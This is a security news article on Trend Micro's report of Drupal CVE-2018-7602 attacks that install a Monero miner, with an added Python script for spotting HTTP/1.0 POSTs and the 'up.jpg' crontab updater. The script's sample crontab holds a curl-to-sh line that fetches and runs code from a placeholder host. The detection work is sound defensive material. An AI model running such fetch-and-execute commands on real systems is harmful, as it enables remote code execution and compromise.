Cybercriminals are delivering Monero-mining malware designed to turn entire systems into mining bots via a Drupal vulnerability that was patched back in April of this year.
Trend Micro researchers observed a series of network attacks during which threat actors were exploiting CVE-2018-7602, a remote code execution (RCE) vulnerability affecting Drupal versions 7 and 8, according to a June 21 blog post.
An attacker who successfully exploits this vulnerability gains elevated permissions to modify or delete content on the Drupal-run site. Researchers noted that while attackers are exploiting the vulnerability to mine cryptocurrency now, it could be used as a doorway to other threats.
The attacks are notable because they employ the HTTP 1.0 POST method to send data back in the SEND_DATA() function.
“HTTP 1.0 traffic is quite uncommon in these kinds of attacks, as most of the HTTP traffic by many organizations is already in HTTP 1.1 or later,” researchers said in the post. “And given this seeming variance, we foresee this as a pattern in future attacks.”
Attackers are downloading a shell script which then retrieves an Executable and Linkable Format (ELF)-based downloader. The downloader then adds a crontab entry to automatically update itself, researchers said in the post. On Unix-based systems, the crontab contains the commands to be executed; in the case observed by researchers, the command checks the link from which it downloads and interprets a script named up.jpg posing as a JPEG file.
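As an added illustration of the detection angle described above (this is not code from the Trend Micro post), the following Python script flags POST requests carried over HTTP/1.0 in web-server access logs and checks a crontab dump for a reference to the up.jpg updater script. The combined log format, the sample log lines and the crontab text are constructed assumptions.

```python
import re
from typing import Dict, List

# Combined-log-format pattern (an assumption; adapt to your server's log format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/(?P<ver>[\d.]+)" '
    r'(?P<status>\d{3}) \S+'
)

def parse_line(line: str) -> Dict[str, str]:
    """Split one access-log line into its fields; empty dict if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else {}

def flag_http10_posts(lines: List[str]) -> List[Dict[str, str]]:
    """Return the entries that are POST requests carried over HTTP/1.0,
    the unusual combination the report ties to the SEND_DATA() traffic."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["ver"] == "1.0":
            hits.append(rec)
    return hits

def crontab_fetches_updater(crontab_text: str) -> bool:
    """True if a non-comment crontab line references up.jpg, the script
    name the report says the downloader uses to update itself."""
    return any(
        "up.jpg" in ln and not ln.lstrip().startswith("#")
        for ln in crontab_text.splitlines()
    )

# Constructed sample input; 192.0.2.0/24 is a documentation range, not a real IoC.
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Jun/2018:10:00:01 +0000] "GET /user/login HTTP/1.1" 200 5120',
    '192.0.2.10 - - [21/Jun/2018:10:00:05 +0000] "POST /user/login HTTP/1.1" 302 0',
    '192.0.2.77 - - [21/Jun/2018:10:02:13 +0000] "POST /index.php HTTP/1.0" 200 1843',
]
# Constructed crontab dump; example.invalid is a placeholder host, not from the report.
SAMPLE_CRONTAB = "# m h dom mon dow command\n*/10 * * * * curl -s http://example.invalid/up.jpg | sh\n"

if __name__ == "__main__":
    for rec in flag_http10_posts(SAMPLE_LOG):
        print(f"HTTP/1.0 POST from {rec['ip']} to {rec['path']} at {rec['ts']}")
    print("crontab references up.jpg:", crontab_fetches_updater(SAMPLE_CRONTAB))
```

Run it against `crontab -l` output and the web server's access log; an HTTP/1.0 POST alone is only a lead, so confirm with the Drupal patch level and the other artifacts the report lists.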
“The ELF-based downloader also retrieves a Monero-mining malware (COINMINER_TOOLXMR.O-ELF64) and installs it on the affected machine,” the post said.
The miner is installed on the machine using the open-source XMRig and checks whether the machine has already been compromised. When the miner starts to run, the malware changes its name to [^$I$^] and accesses the file /tmp/dvir.pi.
Researchers noted they had blocked 810 attacks in the last month from the malicious IP address spreading the malware and that the bulk of attacks from this IP address exploit the Heartbleed vulnerability.
Users are advised to update their systems as soon as possible and ensure they remain patched in order to prevent infection.